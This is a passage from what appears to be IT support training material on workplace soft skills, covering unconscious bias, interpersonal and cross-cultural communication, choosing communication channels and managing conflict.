• Increasing education. Educating employers and employees about the different types of unconscious bias and how to recognize it is one of the most effective methods to reduce this bias at work.
• Creating an inclusive work environment. Having an inclusive work environment will help to broaden perspectives and balance any prejudices.
• Taking into account the types of bias when making decisions. Check your decision for any cultural, racial, ability, or gender stereotypes.
Key Takeaways

• We are all human, each with our own thoughts and opinions. It is important to recognize we do not all think the same way.
• Unconscious/implicit bias is an unavoidable result of being human and can influence daily decisions in our personal and professional lives.
• Make sure to be conscientious about unconscious/implicit bias in the workplace by being open-minded.
• A culture of diversity, equity, and inclusion starts with executive leadership in any organization.
• Continuous education and training are very important and effective for reducing bias at work and promoting a culture of diversity, equity, and inclusion.

Advanced Communication Skills

Interpersonal Communication

In your IT career, you will need to use interpersonal communication every day. You will need to speak with
other people in the company, including employees, managers, and different people outside the company
such as vendors. You may manage a team at some point in your career. This reading will help you build the
interpersonal communication skills you can use for everyday communications.

Interpersonal Communication Types

• Verbal communication - This is spoken communication. You use this when you speak to others at the workplace, on the phone, or at virtual meetings.
• Listening - Listening is more than hearing what people say. Listening is focusing on what they are saying, and receiving their messages.
• Written communication - Letters, emails, text messages, emojis, and GIFs are all different types of written communication.
• Nonverbal communication - Gestures, body language, eye contact, facial expressions, and touch are all examples of nonverbal communication.
Some ways to improve interpersonal communication:

For a team or an organization to work well, members need to be able to say what they need others to know
and to fully understand what others need from them. Here are some tips to help with interpersonal
communication:

• Be consistent with communication - Set communication standards and keep them.
• Focus on workplace communication at work - Personal communication is unprofessional and takes away time you need for work.
• Avoid assumptions - Listen to what the other person says and respond to what the other person is saying. Making assumptions will stop their full message from reaching you.
• Listen actively - Carefully listen to what the other person says and fully understand it before you respond. Responding without knowing the message leads to misunderstanding, and it could lead to conflict.
Making Requests

Members of a team or organization sometimes need to make requests of each other. Effective requests are
more likely to get results, and they show team or organization members they can rely on each other. When
making requests:

• Be sure to know what you are requesting before you make the request.
• Be clear when you make a request - it's important to communicate exactly what you need from the other person.
• You may need to wait for the right opportunity to make the request if the other person is busy.
• Listen carefully, with an open mind, to what the other person has to say after you make the request if the person denies it.
• Always make requests politely and respectfully.
When to use which type of communication

Some communications are done verbally in the workplace or in a virtual meeting. Others are done through
phone calls. Some are done through email, messaging, or on paper. Not all communications use written or
spoken language. Some communication is nonverbal. Each situation calls for one or more types of
communication.

In situations where information has to be given to the whole team, you should share it at the workplace in a meeting or in a virtual meeting using verbal communication. These situations include:

• Announcements the whole team needs to hear
• Ideas and requests for the team
• Requests for individuals that are not personal, such as asking a team member to perform a task for the team
• Discussion points that need to be discussed by the team

A second part of this communication is a group email sent to the team with a recap of the information from the meeting. This will give team members ongoing access to the information, and it will provide the information for any team members who couldn't attend the meeting.
Use group emails to the team when you have something important to share between meetings. Use text
messages when you have short messages for other individuals. You can use personal emails for longer
communications. 

For communications after hours, or for private conversations between two people, you can have a phone
conversation. You can meet the individual in a private office, but private conversations include sensitive
information, so be sure to respect the other person’s privacy and have the conversation in a way no one
else can hear it or join in. Here are some examples of private conversations:

• Criticism - Use criticism to help someone else solve a problem, not to hurt them. If you criticize them in front of the team, it will embarrass them, and it can lead to gossip and conflicts.
• Personal situations - Someone may come to you with personal information. Treat this as a private communication. If the person wants the team to know, they will share it themselves.
Nonverbal communication is important. It helps get the message across without words. It can cause
problems when the wrong message comes through. When having interpersonal communications at work,
try to be careful to avoid too much emotion. Here are some examples of nonverbal cues:

• Facial expressions - Example: A person says they're happy, but they have a sad facial expression. People who see the expression know the person is sad.
• Tone of voice - Tone of voice can say more than the words said. For example, when someone says "good job" in an angry tone, it probably means the speaker isn't happy about what the other person did.
• Eye contact - Looking directly at the speaker demonstrates to them that you are listening and interested in what they have to say.
• Actions - Hand movements and other body movements are also communication. If you slam your fist on a table but say you are not angry, people will still know you are angry.
Leadership and Interpersonal Communication

During your IT Support Specialist career, you may lead a team or have a supervisory role. Communication
skills are essential for a leadership position. You need to be able to communicate:

• Expectations - Be sure to set realistic expectations, and to clearly communicate them to your staff members. Make sure they understand them, and encourage questions if there is something they don't fully understand.
• Asking questions - Asking the right questions is important. Be sure you know exactly what information you need before asking questions.
  ◦ Examine the problem or situation and decide what you need to know.
  ◦ Ask your question in a tone that demonstrates to the other person that you are interested in the answer. If you ask in an overly formal or accusing tone, the other person will feel anxious, and they may not answer fully.
  ◦ Ask your questions clearly, and focus them on what you need to know. If the questions aren't clear, or if they aren't focused on what you need to know, the answers will also be unclear.
  ◦ Actively listen to the answer after you ask the question. You need to fully understand what the other person is saying before you react to the information or use it.
  ◦ After you get the information you need, thank the person who gave you the information. It shows the other person respect, and they will be more likely to answer questions in the future.
Communication for Introverts
If you are an introvert, your communication experiences may be different than what extroverts experience.
Here are some tips for communication for introverts: 

• Think about what you want to know, and ask open-ended questions. That will let the other person give you full answers and take on much of the conversation.
• Use quick greetings and responses to others' greetings. If someone says "good morning" to you, say the same. You can acknowledge the greeting without starting a conversation.
• Prepare for meetings and team or organizational functions. Think about what you are going to say, and have answers ready for questions you may be asked. If someone asks a question you don't have an answer prepared for, ask if you can take a little time to think about it.
Cross-Cultural Communication

You will be working with many different people from different cultures and in different time zones all over
the world. Cross-cultural communication will help you understand the similarities and differences among
different cultural groups and engage with different people from different cultures. For people to work
together in teams and organizations, they need to understand each other well across cultures. 

Working with people from other cultures

Your teams and organizations will have members from all over the world. There will be cultural differences
between you and them. Some things you do will be different from how they do them. Since you are
working with them, you need to understand each other to work together efficiently. Here are some ways to
improve your cross-cultural communications:

• Research and study the cultures of people you work with. Find out what types of gestures and actions they use for communication. Find out if there are any gestures you use that are offensive to them and avoid those gestures. Find out which gestures they understand and try to use those.
• Don't use slang when having cross-cultural communications. Your slang comes from your culture, and other cultures may not understand what it means. In some cases slang from your culture may offend people from other cultures.
• Be careful with humor. Different cultures have different understandings of humor. What is funny in your culture might not be funny in other cultures. People from those cultures may be confused. Sometimes humor that's funny in one culture is offensive in others.
• Speak slower if someone asks you to, but don't speak too slowly or it may offend the other person.

Problems with cross-cultural communication

Problems happen with cross-cultural communication, but if you know what causes them, you can avoid
them. Here are some of the problems that can happen:

• Gesture problems - Simple gestures in one culture can mean something different in another. You may use a gesture that's positive in your culture, but is offensive to the person you are communicating with from another culture. In the same way, another culture's positive gesture may be offensive to you.
• Stereotyping - Stereotyping is offensive, and it gives you the wrong ideas about cultures. Sometimes well-meaning people mistake stereotypes for knowledge of a culture and use them to communicate with members of that culture.
• Misunderstood humor - Most cultures have some form of humor and jokes. People from other cultures might be confused by your joke, or, in some cases, jokes that are funny to you might offend people from other cultures.
• Differences in messaging - You might send an email and find it either doesn't get a response, or the response is slow. Some cultures treat email and other communications differently. You might come from a culture where individuals answer emails right away, but the culture you sent the email to doesn't respond until their whole team looks at the email.
• Time zone problems - The world has 24 time zones, one for each hour. You need to check where the people you are communicating with are and what time zones they're in. Problems happen when someone in one time zone calls out at a regular time like 9:00 in the morning, but the person on the other end of the communication has to wake up at 3:00 in the morning to take the call. The receiver sees this as inconsiderate, and it can lead to conflict and lost opportunities.
Managing Conflict

When people work together, there will be some miscommunications. Problems with interpersonal
communications, cross-cultural communications and clashing thoughts and ideas create conflict. Conflict
can make your team inefficient since members have a difficult time working together. Being able to
manage conflict will keep conflict from harming productivity and help your team work together toward
goals even if they disagree with each other. 

Why does conflict happen?

Conflict happens for many reasons. Here are a few of the situations that cause conflict:

• Personality conflict - Every person is different, and each person has their own personality. Sometimes these personalities clash.
• Work environment problems - Having a negative work environment leads to conflict. It's important to keep a safe, comfortable work environment to prevent conflict.
• Interpersonal communication problems - Misunderstandings and negative responses to criticism cause conflict.
• Cross-cultural communication problems - Cultural misunderstandings and assumptions may create conflicts.
How do I solve conflict?

Conflict is natural when people work together. People have different ideas and disagree. Once conflict
happens, you need to solve the conflict before it becomes worse. 

• Address issues as soon as you see them. Meet with the team members involved in the conflict and listen to what each of them has to say. Give each of them a chance to share their side of the conflict.
• Be clear about what each side needs and address the situation. Once you know what each side needs and you have heard both sides' information about the conflict, find a resolution that will stop further conflict.
• Prevent conflict by keeping a safe, pleasant work environment. Keep the environment positive. Encourage open, friendly communication between team members. If there are minor disagreements, let them share them in an open, positive environment and put them aside before they create bigger problems.
• Encourage team members to share their ideas and cultures with the rest of the team often to promote cultural understanding and prevent cross-cultural communication problems.
What if I’m in the middle of the conflict?
As an IT professional, you will face conflict at times in your career. Conflict will happen, and dealing with it
well will stop it from getting in the way of your work. Handling conflict and interruptions is important for
success in your field. Here are some times you may be faced with conflict:

• Critical feedback - How you take criticism can lead to knowledge or conflict. When you receive criticism:
  ◦ Listen actively to what the other person is saying. Figure out the point they are telling you. Is it constructive criticism? If it is, thank them and learn from it. Work on improving what they criticized you about.
  ◦ If the criticism is empty criticism or hostile criticism, don't fight back. If the person keeps doing it, report the hostile behavior to your supervisor. If you fight back, it will end in conflict.
• Interruptions - Sometimes someone will interrupt you while you are speaking. When you deal with an interrupter:
  ◦ Find a time to talk to the interrupter in private and tell them you are upset about the interruptions. Say something like, "Please let me finish my sentences when I speak. I would be happy to answer any questions or discuss any points after I finish speaking."
  ◦ When they interrupt you at a meeting or in a conversation, calmly ask them to let you finish your sentence. If you react with hostility, your reaction will create conflict.
Key takeaways

• Having good interpersonal communication skills will help you throughout your career as a team member and as a leader. Knowing which type of communication to use helps you get messages across in specific situations.
• You will be working with people from all over the world in your career. Having cross-cultural communication skills will help you understand them and show respect for their cultures. It will also help you teach them about your culture and prevent misunderstandings.
• Managing conflict is important when you are dealing with a team or organization and other team members. Always listen with an open mind to all sides of the conflict.
• When someone criticizes you, responding with hostility will create conflict. If the criticism is constructive, learn from it.
• A safe, comfortable workplace helps prevent conflict.
• Instead of responding to an interrupter with hostility, calmly ask them to let you finish your sentence.